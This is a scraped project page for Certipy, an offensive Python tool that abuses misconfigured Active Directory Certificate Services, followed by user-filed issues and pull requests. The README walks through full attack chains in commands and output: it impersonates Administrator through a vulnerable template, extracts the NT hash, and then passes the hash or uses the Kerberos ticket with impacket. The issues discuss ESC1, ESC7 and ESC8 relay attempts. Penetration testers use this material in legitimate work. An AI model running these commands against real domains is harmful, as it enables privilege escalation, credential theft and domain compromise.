Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

Related tags

MiscellaneousCertipy
Overview

Certipy

Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

Based on the C# variant Certify from @harmj0y and @tifkin_.

Table Of Contents

Installation

$ python3 setup.py install

Remember to add the Python scripts directory to your path.

Usage

$ certipy -h
usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
               target {find,req,auth,auto} ...

Active Directory certificate abuse

positional arguments:
  target                [[domain/]username[:password]@]<target name or address>
  {find,req,auth,auto}  Action
    find                Find certificate templates
    req                 Request a new certificate
    auth                Authenticate with a certificate
    auto                Automatically abuse certificate templates for privilege escalation

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials
                        cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection:
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the
                        NetBIOS name and you cannot resolve it
  -nameserver nameserver
                        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

Examples

Auto

Automatically abuse certificate templates for privilege escalation. This action will try to find, request and authenticate as the Administrator user. Upon success, a credential cache will be saved and the NT hash will be decrypted from the PAC in the TGS_REP.

To demonstrate how easy it is to misconfigure certificate templates, the default certificate template Web Server has been copied to Copy of Web Server. The only change was that the EKU Server Authentication was removed and that authenticated users are allowed to enroll. This will allow enrollees to specify the subject and use it for client authentication, i.e. authenticate as any user. If no EKUs are specified, then the certificate can be used for all purposes. Alternatively, one could add the Client Authentication EKU.

In this example, the user john is a low privileged user who is allowed to enroll for the Copy of Web Server template.

$ certipy 'predator/john:[email protected]' auto
[*] Trying template 'Copy of Web Server' with CA 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'Administrator'
[*] Saved certificate to '1.crt'
[*] Saved private key to '1.key'
[*] Using UPN: '[email protected]'
[*] Trying to get TGT...
[*] Saved credential cache to 'Administrator.ccache'
[*] Trying to retrieve NT hash for '[email protected]'
[*] Got NT hash for '[email protected]': fc525c9683e8fe067095ba2ddc971889

By default, the user Administrator is chosen. Use the -user parameter to create a certificate for another user.

Find

The find action will find certificate templates that are enabled by one or more CAs.

Find vulnerable templates

Use the -vulnerable parameter to only find vulnerable certificate templates.

$ certipy 'predator/john:[email protected]' find -vulnerable
[*] Finding vulnerable certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                : 
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Vulnerable Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  : 
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
    Vulnerable Reasons                  : 'Authenticated Users' can enroll, enrollee supplies subject and template allows authentication
                                          'Authenticated Users' can enroll and template has dangerous EKU

Use the -user parameter to find vulnerable certificate templates for another user. By default, the current user will be used.

Find all templates

$ certipy 'predator/john:[email protected]' find
[*] Finding certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                : 
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : User
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectRequireEmail
                                          SubjectAltRequireEmail
                                          SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
                                          IncludeSymmetricAlgorithms
    Authorized Signatures Required      : 0
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Domain Users
                                          predator\Enterprise Admins
      Object Control Permissions
        Owner                           : predator\Enterprise Admins
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
[...]
  11
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  : 
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator

Request

Request a new certificate from a certificate template. By default, the current user specified in the target parameter will be used.

Request as another user

To request a certificate as another user, use the -alt parameter. This only applies to certificate templates, where the enrollee specifies the subject, or when the CA allows the enrollee to specify a UPN, i.e. User Specified SAN is set to Enabled.

In this example, the user john is a low privileged user. The certificate template Copy of Web Server is a copy of the default Web Server template. The EKU Server Authentication was removed, such that the template has no EKUs (No EKUs = any purpose). The default Web Server template allows the enrollee to supply the subject.

john will request a certificate valid for authentication as jane. The CA predator-DC-CA has Copy of Web Server enabled.

$ certipy 'predator/john:[email protected]' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'jane'
[*] Saved certificate to '2.crt'
[*] Saved private key to '2.key'

The certificate and key will be DER encoded and saved to .(crt|key) , where request ID is returned by the server.

Request as self

It is also possible to request a certificate for the current user. This is a good option for persistence since a certificate is not affected by password changes. By default, domain users are allowed to enroll in the default User template.

$ certipy 'predator/john:[email protected]' req -template 'User' -ca 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN '[email protected]'
[*] Saved certificate to '3.crt'
[*] Saved private key to '3.key'

Authenticate

The auth action will use the PKINIT Kerberos extension to authenticate with the provided certificate. The target user must be specified in the target parameter. If not specified, Certipy will try to extract the UPN from the certificate. The TGT will be saved in a credential cache to .ccache .

The NT hash will be extracted by using Kerberos U2U to request a TGS for the current user, where the encrypted PAC will contain the NT hash, which can be decrypted.

$ certipy 'predator/[email protected]' auth -cert ./2.crt -key ./2.key
[*] Using UPN: '[email protected]'
[*] Trying to get TGT...
[*] Saved credential cache to 'jane.ccache'
[*] Trying to retrieve NT hash for '[email protected]'
[*] Got NT hash for '[email protected]': 077cccc23f8ab7031726a3b70c694a49

Using the NT hash

You can simply pass-the-hash (PTH) for many services. For instance SMB:

$ impacket-smbclient -hashes :fc525c9683e8fe067095ba2ddc971889 'predator.local/[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# who
host:   \\172.16.19.1, user: administrator, active:     1, idle:     0

Using the credential cache

The credential cache currently holds a TGT. The TGT can be used to request TGSs for services. For instance, to request a TGS for the cifs (SMB) service at dc.predator.local:

$ # use TGT from Certipy
$ export KRB5CCNAME=./Administrator.ccache
$ # request TGS
$ impacket-getST -spn 'cifs/dc.predator.local' -dc-ip 172.16.19.100 -no-pass -k 'predator/administrator'
$ # use TGS from impacket-getST
$ export KRB5CCNAME=./administrator.ccache
$ # run smbclient with TGS (notice the FQDN)
$ impacket-smbclient -k -no-pass 'predator.local/[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# who
host:   \\172.16.19.1, user: Administrator, active:     1, idle:     0

Note that impacket-getST will overwrite the credential cache at .ccache . Create a copy of the credential cache from Certipy before requesting a TGS with impacket-getST.

Errors

Please submit any errors, issues, or questions under "Issues". A lot of errors can be caused by the user, tool, and target, but the error handling is not perfect.

Credits

Comments
  • Help understanding limitations of

    Help understanding limitations of "KDC_ERR_PADATA_TYPE_NOSUPP"

    Hello!

    Certipy has identified a number of templates in this environment vulnerable to ESC1. I've done:

    certipy req 'victim.domain/[email protected]' -ca 'CA-NAME' -template 'VULNERABLETEMPLATE' -k -no-pass -alt '[email protected]'

    I got a domainadmin.pfx and I'm ready to test it out.

    When I do certipy auth -pfx domainadmin.pfx -dc-ip ip.of.domain.controller I get:

    [*] Trying to get TGT...
    [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
    

    Upon checking this repo's issues, I came across this one leading me to believe I can use this blog/tool to abuse this path via Linux, but from your blog it's my understanding that if the CA is fully patched, this is a dead end.

    To further confuse me, this blog makes me think abuse still is possible, but this content looks to be specifically about abuse when you've obtained the cert for a domain controller (which I have not).

    Would you point me in the right direction - just so I'm not chasing a dead end?

    opened by 7MinSec 14
  • error: SandboxViolation

    error: SandboxViolation

    error: Setup script exited with error: SandboxViolation: mkdir('/private/var/root/Library/Caches/com.apple.python/private/tmp/easy_install-qii5l5tu', 511) {}

    opened by void-ll 11
  • Got error: 'NoneType' object has no attribute 'request'

    Got error: 'NoneType' object has no attribute 'request'

    I am attempting to perform a certificate request using the current version of certipy.

    I've ran the setup and did not see any issues/errors.

    When attempting the req I am getting a error concerning the request attribute.

    Below is the output from the command as well as the output from the command with the suggested -debug option.

    ============================

    [email protected]:/usr/share/Certipy# certipy req 'domain/usertest:[email protected]' -ca ca3 -template User Certipy v3.0.0 - by Oliver Lyak (ly4k)

    [*] Requesting certificate [-] Failed to get dynamic TCP endpoint for CertSvc [-] Got error: 'NoneType' object has no attribute 'request' [-] Use -debug to print a stacktrace

    ===========================

    [email protected]:/usr/share/Certipy# certipy req 'domain/usertest:[email protected]' -ca ca3 -template User -debug Certipy v3.0.0 - by Oliver Lyak (ly4k)

    [+] Trying to resolve 'dc3' at '192.168.202.2' [+] Generating RSA key [*] Requesting certificate [+] Trying to connect to endpoint: ncacn_np:192.168.0.31[\pipe\cert] [!] Failed to connect to endpoint ncacn_np:192.168.0.31[\pipe\cert]: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.) [+] Trying to resolve dynamic endpoint 'redacted' [+] Failed to resolve dynamic endpoint 'redacted' [-] Failed to get dynamic TCP endpoint for CertSvc [-] Got error: 'NoneType' object has no attribute 'request' Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/entry.py", line 85, in main actionsoptions.action File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/request.py", line 334, in entry request.request() File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/request.py", line 256, in request response = self.dce.request(request) AttributeError: 'NoneType' object has no attribute 'request'

    opened by forensic65x 9
  • ESC7 - Error when attempting to add an officer

    ESC7 - Error when attempting to add an officer

    When attemting to exploit ESC7 and the account I use for authentication does not have the right Manage Certificates, I must add that account as a new officer in order to grant the account that right. This fails for me using Certipy 2.0.6. esc7_dc1

    Once this works, can I delete/remove the officer and possibly other remaining changes after the attack?

    opened by jsdhasfedssad 8
  • certipy: error: unrecognized arguments

    certipy: error: unrecognized arguments

    Hello,

    I have cloned the repo using the command

    git clone https://github.com/ly4k/Certipy.git
    

    I then cd'd into the Certipy directory and ran the command

    sudo python3 /path/to/Certipy/setup.py install
    

    I am trying to execute the basic certipy find command and I am getting an error regarding unrecognized commands

    The command that I am executing is:

    certipy find "fqdn/user_samaccountname:[email protected]_controller_fqdn_or_IPAddress"
    

    After running the command I am getting the error message

    Certipy v4.0.0 - by Oliver Lyak (ly4k)
    
    usage: certipy [-v] [-h] {account,auth,ca,cert,find,forge,ptt,relay,req,shadow,template} ...
    certipy: error: unrecognized arguments: fqdn/user_samaccountname:[email protected]_controller_fqdn_or_IPAddress
    

    I have been to the blog post and read through it but no luck- https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6

    All documentation that I am seeing is on version 2. Could this be a version 4 issue?

    Thanks!

    opened by robertstrom 7
  • Formatting question for

    Formatting question for "ESC1 - SAN Impersonation" attack

    Hello!

    I've got an environment where I've run the Certipy enumeration and have a template vulnerable to ESC1. I've requested a TGT for my "standard" user using GetTGT from impacket. And then I've launched Certipy as follows:

    certipy 'NETBIOS-NAME-OF-DOMAIN/[email protected]' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req template 'VULNERABLETEMPLATE' -ca 'CA-NAME' -alt 'DOMAIN-ADMIN'
    

    When this runs, I get:

    [+] Trying to resolve 'VULN-CA-SERVER' at 'IP-OF-DC'
    [+] Connecting to SMB at 'VULN-CA-SERVER' 
    [+] Using Kerberos Cache: regularuser.ccache
    [+] SPN CIFS/[email protected] not found in cache
    [+] AnySPN is True, looking for another suitable SPN
    [+] SPN KRBTGT/[email protected] not found in cache
    [+] AnySPN is True, looking for another suitable SPN
    [+] No valid credentials found in cache.
    

    This is followed by a traceback and tons of python errors. Do I have a syntax error? I'm not sure what the expected output should look like.

    Thanks, Brian

    opened by 7MinSec 7
  • Help understanding

    Help understanding "relay" issues?

    Hello!

    I'm on a pentest where Certipy has reported a host called "CA" is vulnerable to ESC8.

    I setup Certipy in one window as follows:

    certipy relay -ca ca.domain.com

    In another window I did Coercer with:

    coercer.py -u lowprivuser -p mypass -t IP.OF.A.DC -l MY.KALI.IP.ADDRESS

    In the Certipy window I get:

    Targeting http://ca.domain.com/certsrv/certfnsh.asp
    Listening on 0.0.0.0:445
    Requesting certificate for 'DOMAIN\\DC$' based on the template "Machine'
    Request ID is 123
    Would you like to save the private key? (y/N)
    

    It seems like this is the kind of behavior I'd expect to see if the config was vulnerable to ESC7.

    Any help pointing me in the right direction to troubleshoot would be much appreciated!

    Thanks, Brian

    opened by 7MinSec 6
  • E_INVALIDARG - One or more arguments are invalid

    E_INVALIDARG - One or more arguments are invalid

    An error occurred while requesting a certificate using a domain user I am using version 4.0 This is the command I used:certipy req -username [email protected] -p Passowrd! -ca test-DC01-CA -template User -target 173.100.4.60 -debug The following is the error report: [+] Trying to connect to endpoint: ncacn_np:173.100.4.60[\pipe\cert] [proxychains] Strict chain ... 192.168.172.130:1080 ... 173.100.4.60:445 ... OK [+] Connected to endpoint: ncacn_np:173.100.4.60[\pipe\cert] [-] Got error: RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid. Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/entry.py", line 60, in main actions[options.action](options) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/parsers/req.py", line 12, in entry req.entry(options) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 764, in entry request.request() File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 715, in request cert = self.interface.request(csr, attributes) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 208, in request response = self.dce.request(request) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20220502.112312.90866d4c-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request raise exception

    opened by helloyw 6
  • Problems with passwords that contain '#' ?

    Problems with passwords that contain '#' ?

    Hello,

    I'm using certipy on a pentest where my AD account password has '#' in it. When I run a 'certipy find' I get the below error in the output. I am running the latest/greatest certipy on 2 different pentests right now, and on the pentest where my password is just upper/lower/numbers (and a special character that is not a '#'), certipy runs fine.

    [*] Finding certificate templates
    [+] Authenticating to LDAP server
    [-] Got error: PY_SSIZE_T_CLEAN macro must be defined for '#' formats
    Traceback (most recent call last):
      File "/usr/lib/python3.10/hashlib.py", line 160, in __hash_new
        return _hashlib.new(name, data, **kwargs)
    ValueError: [digital envelope routines] unsupported
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 497, in ntowf_v2
        password_digest = hashlib.new('MD4', self._password.encode('utf-16-le')).digest()
      File "/usr/lib/python3.10/hashlib.py", line 166, in __hash_new
        return __get_builtin_constructor(name)(data)
      File "/usr/lib/python3.10/hashlib.py", line 123, in __get_builtin_constructor
        raise ValueError('unsupported hash type ' + name)
    ValueError: unsupported hash type MD4
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/entry.py", line 85, in main
        actions[options.action](options)
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 736, in entry
        find.find()
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 116, in find
        certificate_templates = self.get_certificate_templates()
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 691, in get_certificate_templates
        certificate_templates = self.connection.search(
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 109, in connection
        self._connection.connect()
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/ldap.py", line 53, in connect
        self.connect(version=ssl.PROTOCOL_TLSv1_2)
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/ldap.py", line 100, in connect
        bind_result = ldap_conn.bind()
      File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 621, in bind
        response = self.do_ntlm_bind(controls)
      File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 1388, in do_ntlm_bind
        request = bind_operation(self.version, 'SICILY_RESPONSE_NTLM', ntlm_client,
      File "/usr/lib/python3/dist-packages/ldap3/operation/bind.py", line 81, in bind_operation
        server_creds = name.create_authenticate_message()
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 379, in create_authenticate_message
        nt_challenge_response = self.compute_nt_response()
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 485, in compute_nt_response
        response_key_nt = self.ntowf_v2()
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 501, in ntowf_v2
        password_digest = MD4.new(self._password.encode('utf-16-le')).digest()
    SystemError: PY_SSIZE_T_CLEAN macro must be defined for '#' formats
    
    opened by 7MinSec 6
  • "Auth" module throws ImportError

    Hi there, I got introduced to Certipy via the TryHackMe room CVE-2022-26923. I installed the latest version of Certipy via PyPI.

    The request module successfully saves a certificate to local storage.

    image

    When I tried to use the certificate for authentication, I got an ImportError.

    image

    The same command using Certipy version 2.0.9 with the same certificate does work.

    image

    I am using a dockerized Kali with Python 3.10 on an aarch64 machine.

    opened by tdekeyser 5
  • RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid

    RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid

    [*] Requesting certificate [-] Got error: RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid. [-] Use -debug to print a stacktrace image

    Has the boss ever reported this error

    opened by howtogetfish 5
  • Support for relaying NTLM to ICPR (ESC11)

    Support for relaying NTLM to ICPR (ESC11)

    Hi,

    Again, thank you for this tool!

    I recently stumbled upon this article about relaying NTLM to ICPR by Compass Security using a CA which has "IF_ENFORCEENCRYPTICERTREQUEST" disabled. They have dubbed it ESC11. They use a fork of Certipy for identification of vulnerable CAs and a fork of Impacket to abuse them. I can see that there is a PR (105) for the identification part but there isn't one for the abuse part. Would you consider supporting ESC11? Both the identification and abuse parts.

    Thanks!

    opened by jsdhasfedssad 1
  • [Enhancement] Adding Dockerfile

    [Enhancement] Adding Dockerfile

    Hi!

    If there's any interest in a dockerized version, I've created a Dockerfile and edited the README with instructions. I hit some dependency snags when working with Certipy and sought to solve them with Docker. The dockerfile is derived from the dockerfiles of Impacket and CrackMapExec.

    The mounted volume is good for collecting all of the artifacts. You should also still be able to publish a port for certipy relay but I have not tested that yet.

    This set up may need some testing to make sure it works in all use cases but so far so good for me! (Tested w. ESC1, 2, 3, Golden Certificate)

    opened by HuskyHacks 0
  • Python 3.11 compatibility because of enum module

    Python 3.11 compatibility because of enum module

    At the moment, Certipy is not compatible with Python 3.11.

    This is because it uses the undocumented _decompose function of the enum module, which apparently got removed in Python 3.11. When running under this version of Python, the following error is shown:

    AttributeError: module 'enum' has no attribute '_decompose'
    

    The problematic function calls are in certipy/lib/structs.py and certipy/lib/constants.py.

    opened by exploide 1
  • Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.

    Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.

    Hello,

    I am building an environment to test ESC2 and ESC3. I have an AD CS template with EKU "Any purpose" setup as well as the default "User" template published.

    First off i'll fetch the "Any purpose" EKU (ESC2/3) template:

    /usr/local/bin/certipy req  -u [email protected] -p ******** -ca test-CA01-CA -template esc2 -target-ip x.x.x.x -dc-ip x.x.x.x
    

    Then i'll use that pfx to sign a new CSR and apply for a client authentication certificate via the default template User on behalt of the Administrator.

    /usr/local/bin/certipy req  -u [email protected] -p ******** -ca test-corp-CA01-CA -template User -on-behalf-of 'DOMAIN\Administrator' -target-ip x.x.x.x -dc-ip x.x.x.x. -pfx test.pfx
    Certipy v4.0.0 - by Oliver Lyak (ly4k)
    
    [*] Requesting certificate via RPC
    [-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
    [*] Request ID is 114
    Would you like to save the private key? (y/N)
    

    I get the same error when i try to renew the initial test.pfx certificate.

    /usr/local/bin/certipy req -renew  -u [email protected] -p ******** -ca test-corp-CA01-CA -template esc2 -target-ip x.x.x.x -dc-ip x.x.x.x -pfx test.pfx
    Certipy v4.0.0 - by Oliver Lyak (ly4k)
    
    [*] Requesting certificate via RPC
    [-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
    [*] Request ID is 115
    Would you like to save the private key? (y/N)
    

    The ESC2/3 privesc works fine from certify.exe from a domain joined windows box.

    I have tried to figure out which ASN.1 tag in https://github.com/ly4k/Certipy/blob/main/certipy/lib/certificate.py#L525 that might be wrong however i'm not successful.

    I'm on the latest 92592c59acf50e5db3ace2947680614c110aff82 commit.

    opened by viksafe 1
  • Some try/except to make it work in a test env

    Some try/except to make it work in a test env

    This makes it work in my test env. If you cant add a machine for example. The others I did not investigate fully, but the try/catch makes certipy at least not fully crash

    opened by realalexandergeorgiev 0
  • "Auth" command after NTLM relay to an HTTP endpoint returns error when getting TGT: KRB_AP_ERR_MODIFIED

    When performing a basic NTLM relay attack (with PetitPotam to coerce auth) using the "relay" command, everything goes fine as you see below:

    image

    The PFX is saved and no error is thrown. However, when you follow this up with a certipy auth as below, a Kerberos error is thrown upon requesting the TGT:

    image

    However, requesting the TGT and NTLM hash with Rubeus works just as expected:

    image

    And then I was able to DC Sync with CME using the NTLM hash and/or TGT:

    image

    The DC involved is a Windows Server 2022 and the CA, on a separate server specifically to facilitate the NTLM relay simulation, is Windows Server 2019. I suspect this may be an issue related to the super up-to-date version of Windows Server that the DC is running on; perhaps Certipy just hasn't been updated to cope with it yet but Rubeus has (it receives more regular updates). Any idea is appreciated, though!

    opened by Alh4zr3d 1
Releases(4.3.0)
Owner
ollypwn
ollypwn
Automates the fixing of problems reported by yamllint by parsing its output

yamlfixer yamlfixer automates the fixing of problems reported by yamllint by parsing its output. Usage This software automatically fixes some errors a

OPT Nouvelle Caledonie 26 Dec 26, 2022
Fonts used to be an install-and-forget thing, but many of are now updated regularly.

Your font manager. Fonts used to be an install-and-forget thing, but many of are now updated regularly. fontman helps you keep track of the fonts you

Nico Schlömer 20 Feb 07, 2022
Simple kivy project to help new kivy users build android apps with python.

Kivy Calculator A Simple Calculator made with kivy framework.Works on all platforms from Windows/linux to android. Description Simple kivy project to

Oussama Ben Sassi 6 Oct 06, 2022
GitHub Actions Version Updater Updates All GitHub Action Versions in a Repository and Creates a Pull Request with the Changes.

GitHub Actions Version Updater GitHub Actions Version Updater is GitHub Action that is used to update other GitHub Actions in a Repository and create

Maksudul Haque 42 Dec 22, 2022
Integration between the awesome window manager and the firefox web browser.

Integration between the awesome window manager and the firefox web browser.

contribuewwt 3 Feb 02, 2022
The Open edX platform, the software that powers edX!

This is the core repository of the Open edX software. It includes the LMS (student-facing, delivering courseware), and Studio (course authoring) compo

edX 6.2k Jan 01, 2023
This is a repository containing the backend and the frontend of a simple pokédex.

Pokémon This is a repository containing the backend and the frontend of a simple pokédex. This is a work in progress project! Project Structure 🗂 pok

André Rato 1 Nov 28, 2021
An extremely configurable markdown reverser for Python3.

🔄 Unmarkd A markdown reverser. Unmarkd is a BeautifulSoup-powered Markdown reverser written in Python and for Python. Why This is created as a StackS

ThatXliner 5 Jun 27, 2022
Fiber implements an proof-of-concept Python decorator that rewrites a function

Fiber implements an proof-of-concept Python decorator that rewrites a function so that it can be paused and resumed (by moving stack variables to a heap frame and adding if statements to simulate jum

Tyler Hou 225 Dec 13, 2022
A Python library to simulate a Zoom H6 recorder remote control

H6 A Python library to emulate a Zoom H6 recorder remote control Introduction This library allows you to control your Zoom H6 recorder from your compu

Matias Godoy 68 Nov 02, 2022
OWASP Foundation Web Respository

WWWGrep OWASP Foundation Web Respository Author: Mark Deen & Aditi Mohan Introduction WWWGrep is a rapid search “grepping” mechanism that examines HTM

OWASP 34 Jun 15, 2022
uMap lets you create maps with OpenStreetMap layers in a minute and embed them in your site.

uMap project About uMap lets you create maps with OpenStreetMap layers in a minute and embed them in your site. Because we think that the more OSM wil

771 Dec 29, 2022
Using Python to parse through email logs received through several backup systems.

outlook-automated-backup-control Backup monitoring on a mailbox: In this mailbox there will be backup logs. The identification will based on the follo

Connor 2 Sep 28, 2022
APC Power Usage is an application which shows power consuption overtime for UPS units manufactured by APC.

APC Power Usage Introduction APC Power Usage is an application which shows power consuption overtime for UPS units manufactured by APC. Screenshoots G

Stefan Kondinski 3 Oct 08, 2021
Low-level Python CFFI Bindings for Argon2

Low-level Python CFFI Bindings for Argon2 argon2-cffi-bindings provides low-level CFFI bindings to the Argon2 password hashing algorithm including a v

Hynek Schlawack 4 Dec 15, 2022
A tool to flash .ofp files in bootloader mode without needing MSM Tool, an alternative to official realme tool

Oppo/Realme Flash .OFP File on Bootloader A tool to flash .ofp files in bootloader mode without needing MSM Tool, an alternative to official realme to

Italo Almeida 70 Jan 02, 2023
A general purpose low level programming language written in Python.

A general purpose low level programming language written in Python. Basal is an easy mid level programming language compiling to C. It has an easy syntax, similar to Python, Rust etc.

Snm Logic 6 Mar 30, 2022
An improved version of the common ˙pacman -S˙

BetterPacmanLook An improved version of the common pacman -S. Installation I know that this is probably one of the worst solutions and i will be worki

1 Nov 06, 2021
This program is meant to take the pain out of generating nice bash PS1 prompts.

TOC PS1 Installation / Quickstart License Other Docs Examples PS1 Command Help PS1 ↑ This program is meant to take the pain out of generating nice bas

Steven Hollingsworth 6 Jun 19, 2022
Mpis-ex7 - Implementation of tasks 1, 2, 3 for Metody Probabilistyczne i Statystyka Lista 7

Implementations of task 1, 2 and 3 from here Author: Maciej Bazela Index: 261743 Each task was implemented in Python 3. I've used Cython to speed up e

Maciej Bazela 1 Feb 27, 2022